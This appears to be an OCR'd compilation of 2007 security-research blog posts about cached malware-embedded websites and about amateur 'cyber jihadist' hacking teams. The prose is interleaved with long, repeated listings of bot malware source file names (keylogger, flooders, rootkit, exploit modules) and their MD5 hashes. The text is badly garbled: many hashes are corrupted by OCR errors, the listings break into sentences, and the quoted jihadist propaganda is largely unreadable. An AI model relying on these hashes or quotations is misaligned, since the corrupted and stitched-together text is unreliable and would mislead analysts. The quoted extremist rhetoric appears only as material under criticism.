8. http://www.avertlabs.com/research/blog/index . php/2007/12/13/web-site-of-the-french-embassy-in-libya-unde 


9. http: //ddanchev. blogspot .com/2007/11/new-media-malware-gang. htm 


10. http: //ddanchev.blogspot .com/2007/10/possibility-medias-malware-fiasco.htm 


11. http: //ddanchev.blogspot.com/2007/10/portfolio-of-malware-embedded-magazines .htm 


12. http://ddanchev.blogspot .com/2007/11/i-see-alive-iframes-everywhere-part-two.htm 


13. http://ddanchev.blogspot .com/2007/12/mdac-activex-code-execution-exploit .htm 


3.12.11 Cached Malware Embedded Sites (2007-12-17 00:38) 


2007 Jul 11 1616 UTC (Jul 11 1016 MDT). No GOES 12 3 
www.sec.noaa.gowSVWN/ - 26k - Cached - Similar pages 


Philippine Securities and Exchange Commission 


This site may harm your computer. 
Rules and regulations, online registrations, advisories and form de 


www.sec.gov.ph/- Similar pag 


SEC - open source and platform independent event co 


SEC - open source and platform independent event correlation toc 


Google, with its almost real-time crawling capabilities, has rarely proved useful while research- 
ing malware embedded sites who were cleaned before they could be analyzed, mainly popular 
sites who get crawled several times daily. However, Yahoo’s and MSN’s search engines, 
with MSN providing Archive.org type of historical crawling content, have been an invaluable 
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826a551d0689a4e0846977a91c5d0fe6 
aliaslog.h 
52307a78ef96b5920f5edc93785166c6 
autostart.cpp 
306dd702bbb1613d95cObb1d8c95ae92 
autostart.h 
ce33622adfc7b6e1543361c2a206229f 
avirus.cpp 
15eae314484b841cc21e6698a504d175 


avirus.h e55a156d28fde56a0bb05fc599dafecf 


beagle.cpp 
45ca74ec0aa5d493533ea48bccc7f890 


beagle.h 76fa5d92efdffaadb93a416dc5ffbaf8 


capture.cpp 
8131417a0ade8b0cd43a6b1a441022dd 
capture.h 
1a27e95a9451b7b9fde4dd31labbe40c4 
cdkeys.cpp 
3f24656c7e76d36b031a0501f0df9693 


cdkeys.h 10199c0132621d0f86774ae3ea965f6c 


changes.txt 
elae581a18cd14502cb53c4ff8a66668 
configs.h 
bdc67be6ae428cdcdb6f4a76f66300e7 
crc32.cpp 
3771c5b3f6992c43c0e12a57c41a727e 
crc32.h 
IcdO0adeb14bdd0dcbc3fe66a5fe2fed9 
crypt.cpp 
f8d56522e7015cff349715794104c50f 
crypt.h 
Oe8cd32d6c5dbb0546c57d7fd213b365 
dameware.cpp 
f14a8d491f640cb67983ce00b78480d2 


dameware.h 
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c5f45e22e790da8dd52d90dd4841b5c7 
dcc.cpp 
bc19d35982b17f731a59c62b1c14c84d 
dcc.h 
€44c57141c37593156064072bd6570c2 
dcom.cpp e88d70532044fcb6e5e8871a1851ed49 
dcom.h 
b2792e423f3ec732793723d53a0e12c8 
dcom2.cpp 
0ad20a541269c646caa86e8cef38d708 
dcom2.h 
€9548b20f8d3d955969a8b515b426db4 
ddos.cpp ed0c9b5120f45a2ccb3572139a7d0061 
ddos.h 
b3d1a37538db741825844dfb3df4f7 2f 
defines.h 
d2ef4a3a60c60f33453c9b55a920f8c2 
download.cpp 

664845639 1laff5fbob872236bcb0af8b5 
download.h 
772d831e6b39c79d829d9fc8cdb713a6 
driveinfo.cpp 
9dc1c0a866f906b262d258a8ca3eda9e 
driveinfo.h 
8f57049be20497bca61df57618ba9cfe 
ehandler.cpp 
7f85493a9bae6ab2dad717786502328c 
ehandler.h 
3644e5ec559d2670426689d1c80b0509 
externs.h 
f7¢44e532aca3c1596e004ca03be6db8 
findfile.cpp 
40273104f4bc7ebcd7f0b87673f39638 
findfile.h 
d21e9ef8155cf3c9efcbe8ec4244357a 
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findpass.cpp 
21f63de47f8f0fdb9f989d6463a89032 
findpass.h 
1fecf202e0ebd30610d74f842979c82c 
fphost.cpp 
3b4e036a97dfabcd636e63245831853a 


fphost.h 7269b3d4234fcbc5da07695ae3483cl1b 


functions.h 
000d108172efd4ble8a4af8a60cal7de 
globals.h 
65ad95c53b660b0fc4bad98f2d2d4b22 
httpd.cpp 
3b321d4bdc50573e2722291788667763 
httpd.h 
288553599c70aa95ec2119d78938578a 
icmpflood.cpp 
5caa21a85ea20819ca40e7454f1llbe33 
icmpflood.h 
4462c6318220648820316848deb124fd 
ident.cpp 
9f22919c49284e257ce0ed79dbd29bf6 
ident.h 
56c539d97aec2572f6fc9349edd7d9c2 
includes.h 
d6478f56ee26ac92c9b87cbe49fal446 
irc send.cpp 
6a084f0b44846cfbd50498b8b03687e3 
irc send.h 

30d0176a5e9b6e3e5al 9bfb1lfcda444c 
keylogger.cpp 

€569621c990b3 7affc9cf4b050f2df2e 
keylogger.h 
a00df900cf42e596e4c48e8a9d52afed 
kuang2.cpp 
ce5f0f4d470b760d2276fab309878420 
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kuang2.h fc3343ecc92dba61f83260bbb93aa70c 
list.txt 50594305fa90c9596c69be1lad1a454a4 
loaddlls.cpp 
1186093534flcfb47efd3e4e922c95d4 
loaddlls.h 
4703f87679db3655151348076c41a83a 
Isass.cpp 
77a1c6898ffa3ac3c60a49e30dd2c2al 

Isass.h 
5b9d615744a8d6f4b2c9c19d2aed46ef 
misc.cpp 4770444fdc75d9baac93b3bc29bfa51f 
misc.h 

f035c1642a8e3ff49ff19bb1be316333 
mssql.cpp 
2ea31bdb396d29250fd6fédbdf231433 
mssql.h 
742394ed531laab2ecc958daf5305723e 
mydoom.cpp 
cfcbabd00798a130fe0366975a9a0f50 
mydoom.h c7d0eda136c75da543c4al14f9c28b7d6 
myshellcode.asm 
ce26d85257d8fa2c68a5ad6012ed010c 
net.cpp 

a1193f36f9bc058f9306fa922b957ed9 

net.h 

b1bb95c11a47aa666acd9a5929861726 
netbios.cpp 
904a4d19d94ab75dbe67e628831c0ef9 
netbios.h 
dd155768799804528c6cd19d67df42a3 
netdevil.cpp 
892dd8fd4a08ede457f9346b5edd832e 
netdevil.h 
a89982a588e965ce01448c60a81585b3 
netutils.cpp 

12296 


7€91597c24a39f15682b255dc78973d5 
netutils.h 
ccbb3172d63a28dae5a98af36c27e354 
nicklist.h 
e9eb7e67eb89f60039d17c3fc5609ab4 
advscan.cpp 
5f4aa4c0f65cdf8ede59cOd62fdb65le 
advscan.h 
c67d944559e747clee795c57fb616d8d 
aliaslog.cpp 
826a551d0689a4e0846977a91c5d0fe6 
aliaslog.h 
52307a78ef96b5920f5edc93785166c6 
authors.txt 
5e70b680fcdafdbbd86d5b010dbb8b87 
autostart.cpp 
306dd702bbb1613d95cObb1d8c95ae92 
autostart.h 
ce33622adfc7b6e1543361c2a206229f 
avirus.cpp 
15eae314484b841cc21e6698a504d175 
avirus.h e55a156d28fde56a0bb05fc599dafecf 
beagle.cpp 
45ca74ec0aa5d493533ea48bccc7f890 
beagle.h 76fa5d92efdffaadb93a416dc5ffbaf8 
capture.cpp 
8131417a0ade8b0cd43a6b1a441022dd 
capture.h 
1a27e95a9451b7b9fde4dd31labbe40c4 
cdkeys.cpp 
3f24656c7e76d36b031a0501f0df9693 
cdkeys.h 10199c0132621d0f86774ae3ea965f6c 
configs.h 
e955fbad83db473e46960b909b972a10 
crc32.cpp 
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3771c5b3f6992c43c0e12a57c41a727e 
crc32.h 
1cd0adeb14bdd0dcbc3fe66a5fe2fed9 
crypt.cpp 
f8d56522e7015cff349715794104c50f 
crypt.h 
Oe8cd32d6c5dbb0546c57d7fd213b365 
dameware.cpp 
f14a8d491f640cb67983ce00b78480d2 
dameware.h 
c5f45e22e790da8dd52d90dd4841b5c7 
dcc.cpp 
bc19d35982b17f731a59c62b1c14c84d 
dcc.h 
€44c57141c37593156064072bd6570c2 
dcom.cpp 4e471cd272ce08f686628e4a9a3309db 
dcom.h 
b2792e423f3ec732793723d53a0e12c8 
dcom2.cpp 
e44f7e7a29eb230cd782e5b962ff807a 
dcom2.h 
€9548b20f8d3d955969a8b515b426db4 
ddos.cpp ed0c9b5120f45a2ccb3572139a7d0061 
ddos.h 
b3d1a37538db741825844dfb3df4f7 2f 
defines.h 
ef3f412b2b20bc4ae68776587f6c1fdf 
download.cpp 

664845639 lLaff5fbob872236bcb0af8b5 
download.h 
772d831e6b39c79d829d9fc8cdb713a6 
driveinfo.cpp 
9dc1c0a866f906b262d258a8ca3eda9e 
driveinfo.h 
8f57049be20497bcab61df57618ba9cfe 
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ehandler.cpp 
7f85493a9bae6ab2dad717786502328c 
ehandler.h 
3644e5ec559d2670426689d1c80b0509 
externs.h 
de46029aee975069ab6fb9ef3515c2b42 
findfile.cpp 
40273104f4bc7ebcd7f0b87673f39638 
findfile.h 
d21e9ef8155cf3c9efcbe8ec4244357a 
findpass.cpp 
21f63de47f8f0fdb9f989d6463a89032 
findpass.h 
1fecf202e0ebd30610d74f842979c82c 
fphost.cpp 
3b4e036a97dfabcd636e63245831853a 


fphost.h 7269b3d4234fcbc5da07695ae3483cl1b 


functions.h 
000d108172efd4ble8a4af8a60cal7de 
globals.h 
65ad95c53b660b0fc4bad98f2d2d4b22 
httpd.cpp 
3b321d4bdc50573e2722291788667763 
httpd.h 
288553599c70aa95ec2119d78938578a 
icmpflood.cpp 
5caa21a85ea20819ca40e7454f1ll1lbe33 
icmpflood.h 
4462c6318220648820316848deb124fd 
ident.cpp 
9f22919c49284e257ce0ed79dbd29bf6 
ident.h 
56c539d97aec2572f6fc9349edd7d9c2 
includes.h 
4cb2e277eaee6a70467b72db23e16670 
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irc send.cpp 
6a084f0b44846cfbd50498b8b03687e3 

irc _send.h 

30d0176a5e9b6e3e5al 9bfb1fcda444c 
keylogger.cpp 
€569621c990b37affc9cf4b050f2df2e 
keylogger.h 
a00df900cf42e596e4c48e8a9d52afed 
kuang2.cpp 
ce5f0f4d470b760d2276fab309878420 
kuang2.h fc3343ecc92dba61f83260bbb93aa70c 
list.txt 50594305fa90c9596c69be1ad1a454a4 
loaddlls.cpp 
1186093534flcfb47efd3e4e922c95d4 
loaddlls.h 
4703f87679db3655151348076c41a83a 
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resource in providing the actionable historical intelligence in the form of what was embedded 
at the site, where was it pointing, are there many other sites currently embedded by the same 
Campaign etc. This is an interesting opinion stating that cached malware embedded sites 
are a security problem, well they’re, but the bigger problem to me is that it’s only Google 
that’s taken efforts to deal with the problem next to the market challengers - Yahoo and MSN - 
"[1]Google, Yahoo, Microsoft Live search engines contain page-caching flaw, says Aladdin" : 


"Researchers at Aladdin Knowledge Systems have discovered a “significant” vulnerabil- 
ity in the page-caching technologies of three major search engines, allowing them to deliver 
malicious pages that have been removed from the web. The researchers discovered the 
vulnerability when analysing the content of a hacked university website. The site was cleaned, 
but malicious content was still reachable via search engine caches. The flaw is a "glimpse of 
the future" of multifaceted web-based attacks, said Ofer Elzam, director of product manage- 
ment at Aladdin." 


Let’s discuss the current model of dealing with such sites. Whenever Google comes 
across a site that’s potentially malware embedded, they don’t just label it "this site may harm 
you computer" but also remove all the cached copies of the site. By doing so, they protect the 
"cached surfers crowd", and by doing so, often prompt me to locate the actual cached copies 
with the embedded malware hopefully still there by using other search engines, ones whose 
crawling capabilities aren’t as fast as Google’s. 


Therefore, don’t put Google in the same row as Yahoo and MSN, since Yahoo and MSN 
do not provide such in-house built malware embedded sites notification services, and given 
the slow content crawling, it’s among the top reasons why | love using their search en- 
gines given I’m aware of a malware embedded site, but couldn’t obtain the obfuscated 
javascript/IFRAME before it got removed. 


Here’s an example of how useful cached malware sites are for research purposes. Back 
in September, the [2]U.S Consulate in St.Petersburg was serving malware, and the embedded 
malware link was removed sooner than | could obtain a copy of the infected page. Best of all 
- there were still cached copies available serving the malware which lead to the assessment 
of the campaign. Another great example that the intelligence sharing between the industry, 
independent reseachers and non-profit organizations, is resulting in far more detailed expo- 
sures of various malicious campaigns, compared to a vendor’s self-sufficiency mentality. 


This is how Google understand the [3]malicious economies of scale, where efficiency 
gets sacrificed for a short lifecycle of the campaign, [4]a trade-off I’ve been discussing for [5]a 
while especially [6]in respect to the [7]Rock Phish Kit : 


"Examining our data corpus over time, we discovered that the majority of the exploits 
were hosted on third-party servers and not on the compromised web sites. The attacker 
had managed to compromise the web site content to point towards an external URL hosting 
the exploit either via iframes or external JavaScript. Another, less popular technique, is to 
completely redirect all requests to the legitimate site to another malicious site. It appears 
that hosting exploits on dedicated servers offers the attackers ease of management. Having 
pointers to a single site offers an aggregation point to monitor and generate statistics for 
all the exploited users. In addition, attackers can update their portfolio of exploits by just 
changing a single web page without having to replicate these changes to compromised sites. 
On the other hand, this can be a weakness for the attackers since the aggregating site or 
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domain can become a single point of failure." 


Google are clearly aware of what’s going on, but are trying to limit the potential for 
false positives of sites wrongly flagged as ones serving malware, which is where malicious 
parties will be innovating in the future, while it still remains questionable why they still haven’t 
done so by obvious means - [8]RBN’s directory permissions gone wrong for instance. 


The bottom line - cached malware embedded sites are a valuable resource in the arse- 
nal of tools for the security researcher/malware analyst to use, and not necessarily a threat if 
it’s Google’s approach of removing the cached copies we’re talking about, prior to notifying 
of the infection. Which leads us to more realistic attack tactic than the one discussed in the 
article, where an attacker will supposedely embedd malware at different sites, let the search 
engines crawl and cache it, than remove the sites and wait for the visitors to use the cache, 
thereby infecting themselves. Case in point - the U.S Consulate’s site for instance wasn’t 
even flagged by Google as malware embedded one, which is hopefully the result of their 
fast crawling capabilities, but the ugly attack tactic | have in mind is not just embedding the 
IFRAME, but embedding an obfuscated IFRAME that leads to the usual obfuscated exploit URL, 
which is what happend in the Consulate’s case, an obfuscated IFRAME by itself. 
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dcom.cpp acea5e7fd1133f94c9e89756c5c0cc27 
dcom.h 
b2792e423f3ec732793723d53a0e12c8 
dcom2.cpp 
0ad20a541269c646caa86e8cef38d708 
dcom2.h 
€9548b20f8d3d955969a8b515b426db4 
ddos.cpp ed0c9b5120f45a2ccb3572139a7d0061 
ddos.h 
b3d1a37538db741825844dfb3df4f7 2f 
defines.h 
edfee264776272d32fecca8elc3bblea 
download.cpp 

664845639 Laff5fob872236bcb0af8b5 
download.h 
772d831e6b39c79d829d9fc8cdb713a6 
driveinfo.cpp 
9dc1c0a866f906b262d258a8ca3eda9e 
driveinfo.h 
8f57049be20497bca61df57618ba9cfe 
ehandler.cpp 
7f85493a9bae6ab2dad717786502328c 
ehandler.h 
3644e5ec559d2670426689d1c80b0509 
externs.h 
de46029aee975069ab6fb9ef3515c2b42 
findfile.cpp 
40273104f4bc7ebcd7f0b87673f39638 
findfile.h 
d21e9ef8155cf3c9efcbe8ec4244357a 
findpass.cpp 
21f63de47f8f0fdb9f989d6463a89032 
findpass.h 
1fecf202e0ebd30610d74f842979c82c 
fphost.cpp 
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3b4e036a97dfabcd636e63245831853a 
fphost.h 72b9b3d4234fcbc5da07695ae3483c1b 
functions.h 
000d108172efd4ble8a4af8a60cal7de 
globals.h 
65ad95c53b660b0fc4bad98f2d2d4b22 
httpd.cpp 
3b321d4bdc50573e2722291788667763 
httpd.h 
288553599c70aa95ec2119d78938578a 
icmpflood.cpp 
5caa21a85ea20819ca40e7454f11be33 
icmpflood.h 
4462c6318220648820316848deb124fd 
ident.cpp 
9f22919c49284e257ce0ed79dbd29bf6 
ident.h 
56c539d97aec2572f6fc9349edd7d9c2 
includes.h 
4cb2e277eaee6a70467b72db23e16670 
irc send.cpp 
6a084f0b44846cfbd50498b8b03687e3 
irc _send.h 

30d0176a5e9b6e3e5al 9bfb1fcda444c 
keylogger.cpp 
€569621c990b37affc9cf4b050f2df2e 
keylogger.h 
a00df900cf42e596e4c48e8a9d52afed 
kuang2.cpp 
ce5f0f4d470b760d2276fab309878420 
kuang2.h fc3343ecc92dba61f83260bbb93aa70c 
loaddlls.cpp 
1186093534flcfb47efd3e4e922c95d4 
loaddlls.h 
4703f87679db3655151348076c41a83a 
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misc.cpp 4770444fdc75d9baac93b3bc29bfa51f 
misc.h 
f035c1642a8e3ff49ff19bb1be316333 
mssql.cpp 
2ea31bdb396d29250fd6fédbdf231433 
mssqI.h 
742394ed531laab2ecc958daf5305723e 
mydoom.cpp 
cfcbabd00798a130fe0366975a9a0f50 
mydoom.h c7d0edal136c75da543c4al14f9c28b7d6 
myshellcode.asm 
ce26d85257d8fa2c68a5ad6012ed010c 
net.cpp 
a1193f36f9bc058f9306fa922b957ed9 
net.h 
b1bb95c11a47aa666acd9a5929861726 
netbios.cpp 
904a4d19d94ab75dbe67e628831c0ef9 
netbios.h 
dd155768799804528c6cd19d67df42a3 
netdevil.cpp 
892dd8fd4a08ede457f9346b5edd832e 
netdevil.h 
a89982a588e965ce01448c60a81585b3 
netutils.cpp 
7€91597c24a39f15682b255dc78973d5 
netutils.h 
ccbb3172d63a28dae5a98af36c27e354 
nicklist.h 
e9eb7e67eb89f60039d17c3fc5609ab4 
optix.cpp 
6c3d9eaf1d647623e49290e2b09874c7 
optix.h 
3421ea53b60d9533328808627b869ccc 
passwd.h c300d3b2a40113092a84186424b56079 
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peer2peer.cpp 
7fa712db3241c69112b7a853516ff0f5 
peer2peer.h 
920cce5177elfcaacdf28ec4aalc18b1 
pingudp.cpp 
8092a2919dab44410b1802c1b31ddc7a 
pingudp.h 
b86f6921f7a720d6e7b204fbeb34e8d4 
processes.cpp 
Off6cd6325e6f63db3d44355843d4b08 
processes.h 
f7c75cccfaaef0c459ac6c020cf6808d 

psniff.cpp 
c4eb189f05d2a7ff652afeOcdab3bd17 

psniff.h 5eebe93de4e03bf0bb118e35997743a9 
rBot.cpp 44c7b9207eeb15bed6ada960a4b68da8 
rBot.dsp e2de7c5a4460d5b046bf6c33fbc9e457 
rBot.dsw 37a2056d806c2c07d6a5e0ad7a9b75a0 
rBot.h 

6d17278915220464f9502b8ce5451f67 
rBot.ncb 801e9f96db921b804adeb993f93ec4c3 
rBot.opt 4802ec2df7e95flc6af7eb0716abb5e4 
rBot.plg 2ec1d9048e81c9659fa568a02ab62b95 
redirect.cpp 
dacd372119ae0ab1750b3e2f83382a52 
redirect.h 
9e5349d6d6944a179b9ca7a7d847c335 
remotecmd.cpp 
35014f60da50aef7b6a7al19ff893247a 
remotecmd.h 
1fb45492f87a66e34be6b4ca55b1cf86 
reqbuf.bin 
2d8fe918744e0f97f435f973d2af0be4 
rlogind.cpp 
2f26ca25770b2f22201d40541b1d9d29 
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rlogind.h 
dbc479f2720ba03cb946419fbef774e0 
rndnick.cpp 
89c13d836afadc25fb95c4d69bb627c5 
rndnick.h 
3cbe632d4ca6f1l52ca2a13bb1561d292 
scan.cpp 66cOcfe5563eb8191fda0d9a6781lacOf 
scan.h 

6236be771c0c88df937f75845a064f12 
secure.cpp 
0385d82f95182e40ed61329826da5934 
secure.h 231le3dd2ba09a8bbc039caf634e5306d 
session.cpp 
82e74c83142171a4998ca76b20b4177¢c 
session.h 
5f8c353634b560052a5ebee5ef27ae32 
shellcode.cpp 
b16b4f6éaaf8a8c11822c931dc84f77d4 
shellcode.h 
cal14f267b73bc867b075ca56f524d52e 
socks4.cpp 
7d9d022be20b4dca6a204f8c1e027dbb 
socks4.h b103f307ff02cd98fe2bfbecbd19c011 
sub7.cpp ab416250dc7c47a499f6dd28b99elac0 
sub7.h 

c60800f9fecb35bb27384594b46feb22 
synflood.cpp 
d860c99e49b7c19e49c61a21baf0f66b 
synflood.h 
78df095c5aa59a0bfaa783e6edd38d0d 
sysinfo.cpp 
17375b805605f717739a8085be3f21f3 
sysinfo.h 
38774eadb5ba365df293ba4a222c4163 


tcpflood.cpp 
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dd12816e442003152d2f65d42ce7eeb8 
tcpflood.h 
a9165cc828d623c51c297ec888803d9F 
tcpflood2.cpp 
65eaf8f6e8c69ed36fd175cc89d1644f 
tcpflood2.h 
f8307cc6251c3fce249a794314103804 
tcpip.h 
41b08a9fae20869c4eca0bae6dc2d971 
tftpd.cpp 
e11ccc19202c00c861e229c83b1907a2 
tftpd.h 
01a889b931f69e44f3a9421e16c327bc 
threads.cpp 
cbe0ba8b50028430092c7f0e78841b71 
threads.h 
4414d669e296201e23ecfabb616f7536 
upnp.cpp 02d082807cbb76759600d516143a214b 
upnp.h 
6be3f6b1cfecla51673271021f67cab6 
visit.cpp 
27fb4f513a944ba46a905c796bce0c81 
visit.h 
766e4add98e2cb96bd37e87f4d9dfff9 
webdav.cpp 
3b0fb2d9a7499f1710ef4e7077858533 
webdav.h cblccbbb8ab3884e8e40ddb76a386bad 
wildcard.cpp 
8785f287656995d8621d455ac7e04ab7 
wildcard.h 
64fa15a50564415d397166c3d0aec0a6 
workstation.cpp 
3be726c7f2e4404b198ff5f7042318c7 
workstation.h 
d16ef3f05e153e67803fba8d67532dal 
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vc60.idb 4d08ae044314e59df750057ffa0d3fcl 
aliaslog.cpp 
f9db4cbafe19d17975665d694c7a4cfa 
aliaslog.h 
52307a78ef96b5920f5edc93785166c6 
autostart.cpp 
306dd702bbb1613d95cObb1d8c95ae92 
autostart.h 
ce33622adfc7b6e1543361c2a206229f 
avirus.cpp 
92917e1d8364a7f27fca0ce163c6337a 
avirus.h e55a156d28fde56a0bb05fc599dafecf 
capture.cpp 
8131417a0ade8b0cd43a6b1a441022dd 
capture.h 
1a27e95a9451b7b9fde4dd31labbe40c4 
cdkeys.cpp 
3f24656c7e76d36b031a0501f0df9693 
cdkeys.h 10199c0132621d0f86774ae3ea965f6c 
configs.h 
8fafcdc62983499280415bc1249ed7fe 
crc32.cpp 
3771c5b3f6992c43c0e12a57c41a727e 
crc32.h 
IcdO0adeb14bdd0dcbc3fe66a5fe2fed9 
crypt.cpp 
f8d56522e7015cff349715794104c50f 
crypt.h 
Oe8cd32d6c5dbb0546c57d7fd213b365 
dcc.cpp 
08e3757b9a7164daeca6c9cfccb0b54d 
dcc.h 
€44c57141c37593156064072bd6570c2 
dcom.cpp b4cdb6955626f67a46de08eb1a402a44 
dcom.h 
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b2792e423f3ec732793723d53a0e12c8 
dcom2.cpp 
7c1fa9e124ca0629795c13b68c82f25b 
dcom2.h 
baf9d3b315b1d84ad96ea9d89999753e 
ddos.cpp 57563240a7128e3467b830bfb7051996 
ddos.h 
b3d1a37538db741825844dfb3df4f7 2f 
defines.h 
18b2895e3b5aa9eb99d3b7152c03562d 
download.cpp 
3d7ef84d0d9f98d9e8eedlad9b26e1d1 
download.h 
772d831e6b39c79d829d9fc8cdb713a6 
driveinfo.cpp 
a82dd16cO0f23cd9e4bcclde1d2684elf 
driveinfo.h 
8f57049be20497bca61df57618ba9cfe 
ehandler.cpp 
7f85493a9bae6ab2dad717786502328c 
ehandler.h 
3644e5ec559d2670426689d1c80b0509 
externs.h 
f7¢44e532aca3c1596e004ca03be6db8 
findfile.cpp 
9237a147ac404f4e40f47982a7 7f4fe2 
findfile.h 
d21e9ef8155cf3c9efcbe8ec4244357a 
findpass.cpp 
368bac9bceb39403f0f266b6d6fe572d 
findpass.h 
1fecf202e0ebd30610d74f842979c82c 
fphost.cpp 
3b4e036a97dfabcd636e63245831853a 
fphost.h 72b9b3d4234fcbc5da07695ae3483c1b 
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functions.h 
000d108172efd4ble8a4af8a60cal7de 
globals.h 
65ad95c53b660b0fc4bad98f2d2d4b22 
httpd.cpp 
0b2c304f1bda3304413f4ba30f65c179 
httpd.h 
288553599c70aa95ec2119d78938578a 
icmpflood.cpp 
bc23b4a7eb3944f249169863e63d8839 
icmpflood.h 
4462c6318220648820316848deb124fd 
ident.cpp 
92e7e61b3b2ee112a65543765f76c9ed 
ident.h 
56c539d97aec2572f6fc9349edd7d9c2 
includes.h 
0ec726e413c02b2bf3398b837b6de7ca 
irc send.cpp 
6a084f0b44846cfbd50498b8b03687e3 
irc send.h 
30d0176a5e9b6e3e5al9bfb1lfcda444c 
keylogger.cpp 
366c35f6d0bb2b63f67a6cc8cf02c145 
keylogger.h 
a00df900cf42e596e4c48e8a9d52afed 
loaddlls.cpp 
8d30be2a2ab63a90b655fd9833db01141 
loaddlls.h 
4703f87679db3655151348076c41a83a 
Isass.cpp 
6a9f9e0d934c0260180a4539f2dcd58c 
Isass.h 
569113547489a68f47ba936087a9fcdb 


banner.obj 
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6ad9ff463d2756c6fc997cfdffd71b5e 
pstorec.tlh 
355fc614b775f1b5181ff65500664f49 
pstorec. tli 
ddclc3cec67d300b3e6ed94408ca8b7e 
vscan.obj 
d9e2dc4bb5f17c7b6ef4a5065f40ce91 
remove.cpp 
bec30fa04730b0e8f3dc5b9b3bf49bca 
remove.dsp 
224a1dadc892b4c2f45272926f3d100c 
remove.dsw 
6c87112017aad0a5ce8acaa25d6806c5 
remove.ncb 
3e6ee0d5ae27cfddfff0Of9bb6617db13 
advscan.cpp 
al96b2ae3bbf80cf74e4ea37582c3eb6 
advscan.h 
5c5f7fb1lb7ed612771lab2bdcOlab9f9b 
asn.cpp 
b95bd20efff49b927dal6e213f438749 
asn.h 
b9321a4d186254af897035566e86e114 
banner.cpp 
le2bdef556281404cc9a3321aa7a407c 
banner.h f27746db68f05c719251ladba69d0c4bb 
commands.cpp 
24b6422882b662bafb998d0a9c27e753 
commands.h 
89040fed6a3832f75a4b978ee0ffb4d1 
configs.h 
a6f3d1621bbd281161e2e34b7189728f 
crypt.cpp 
f03cca9691dd9ad588e4287524021c3e 
crypt.h 
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3.12.12 Cyber Jihadist Hacking Teams (2007-12-17 16:28) 


ame of Allah. } B Mi fu 
All Praise is for Allah, and may Prayers and Peace be upon the Messenger of Allah and upon his Family, Companions, and whoever is guided by his guidance. 
JIHAD is the term used for struggle against evil. Electronic jibad or simply , E- JIHAD , is the jihad in cyberspace against all the propagandas and false allegations against the message of truth . E-JIHAD is 
the struggle in cyber space against all false and evil disciplines, ideology and forces of evil 


Have you ever think what is the need of army? T ntr had is the battle in the field f . 
against all false believes, and to defend the truth ag ya borders of a n: x) 
It ic caid,* it is mot the gun, it is man behind the gun *. Do you ever think what makes a “man “? Nothing, but just the faith and ideology. Without faith and ideology, there it nor ~ 
then have gun , but without any man 
The Muslims in general and the scholars in particular are 
ight, 
giv 
Allah Subbanu Wata’Allah al d dow 
R 10% <3 
that means if we dont want not to be among lovers , we have to follow the HOLY teachings of Allah as well at we have to try to spread the DIVINE TEACHINGS to every human being 
Very simple, just believe that you are a cyber soldier to defend your religion, to defend your faith, to defend your HOLY TEACHINGS OF HOLY QURA’AN AND SUNNAH, and you will 
MUJAHID*« 
a a aP net and it ailab nea 
aj 
DPMPMRPD ssn dant himetada ane avirs arrannamante foe"P ITHATI® it hae na cout hott iP einer ealee af eure fetid af errr in Phas like oe wnalll ae like after death 


These groups and fractions of religiously brainwashed IT enthusiasts utilizing outdated ping 
and HTTP GET flooding attack tools, represent today’s greatly overhyped threat possed by 
the cyber jihadists whose cheap PSYOPS dominate, given the lack of strategical thinking, and 
the lack of sustainable communication channels between them, ruined all of their Electronic 
Jihad campaigns so far. Religious fundamentalism by itself evolves into religious fanaticism, 
and with the indoviduals in a desperate psychological need for a belonging to a cause, ends 
up in one of the oldest and easiest methods for recruitment - the one based on religious beliefs. 


The teams, and the lone gunmen cyber jihadists in this post are : Osama Bin Laden’s 
Hacking Crew, Ansar AL-Jihad Hackers Team, HaCKErS aLAnSaR, The Designer - Islamic 
HaCKEr and Alansar Fantom. None of these are known to have any kind of direct relationships 
with terrorist groups, therefore they should be considered as terrorist sympathizers. 


_Osama Bin Laden’s Hacking Crew 

OBL’s Hacking Crew are anything but cheap PSYOPsers trying to teke advantage of outdated 
conversational marketing approaches to recruit more members, for what yet remains unknown 
given the lack of any kind of structured formulation of their long-term objectives. They’re also 
promoting the buzz word "E-MUJAHID" to summarize all the possible taska and objectives one 
would have. This is how they define E-JIHAD : 
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c2edef9177543e1b8a8611d347d99b66 


dcom.cpp af90ccde9f7bbcaef92e9d6abee25af3 


dcom.h 
1515fd93ad7196026d7679f5b478alab 
defines.h 
2ba360fdele4367a33a6709217586520 
download.cpp 
2b17d55de73f19dfa454d78dd579a966 
download.h 
d9157dc8f81483e56884f62a6473d717 
driveinfo.cpp 
87a2e732800aa01820b0aee958cc8b03 
driveinfo.h 
0e4b3578110edb7511798fbb69827 Off 
externs.h 
67adfb72efa5b95b8bd0144a86cc5e74 
fphost.cpp 
adf7db95bd67da6577c0aaa469737f5f 


fphost.h eff3d1ba2e46287f3b0d01571aa2ac73 
ftpd.cpp e06bcc127636ebf60b6ed52bb321a617 


ftpd.h 
da4f3d35010ladb59be91cal6fec3be2 
fu.cpp 
4c12e14985891ba6e7fe1d978ccf0756 
fu.h 
5ee58b9c18fe86d14654fe31c1793606 
fudll.h 
440e034c517d25b7039bcc1f86f064a3 
functions.h 
774de6ce4ddfc9ef4c0aaa9fcb3bd801 
includes.h 
21c5b386289fbdf79ff2a22355498f5b 


info.cpp 948acaa3d8a91285e456fe727a9bfe00 


info.h 
70994ba4e7570710ddc3a4c91e494c22 


12323 


ioctlcmd.h 
278822516d1890ad95db1872d6626efc 
irc.cpp 
b48114a264d5b2fe27b00bb0fc819bbb 
irc.h 
1261d7930e35b8c5254d204315f6ca81 
keylog.cpp 
a6d6a69e440864e350e9d13f5b5db023 
Driver.cpp 
da597ef704450dc6904423517235ef90 
Driver.dsp 
1f7e4ff782992330e6ed605d6b8acfbf 
Driver.dsw 
846ff40dec86f0d4dd4692dd0e3d7e3f 
Driver.h 7404062b35f7bd208c655743a0244550 
Driver.ncb 
79ed9635dcd429b20560006363a38725 
ioctlcmd.h 
278822516d1890ad95db1872d6626efc 
Jiurl PortHide.cpp 
cfa49de552c06a8dda5fca38f35ab4le 
Jiurl _PortHide.h 
3e0d1188486e85ce18678cea28066cd0 
Jiurl _tcpioctl.h 
3a7eba644b780e2a0f80a2ef84a4d5e3 
ProcessName.c 
cleabda9fe46de0f319ab6d9e9ff7399 
ProcessName.h 
f9151b283bf37ae51fd410fdacd8a962 
Rootkit.cpp 
24dceblacff18fc6a3ba90895450677b 
Rootkit.h 
020c7d2c685ecf554c32ed643bcc8c8e 
encrypt.exe 
7d400a514eebececabc78541fe5cb5e4 
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reptile.txt 
9d4b0252138c69c59720d95f9ec121f7 
asnl1.h 
2bae81693ebf68e23f3ad3f3021889be 
asnl1_mac.h 
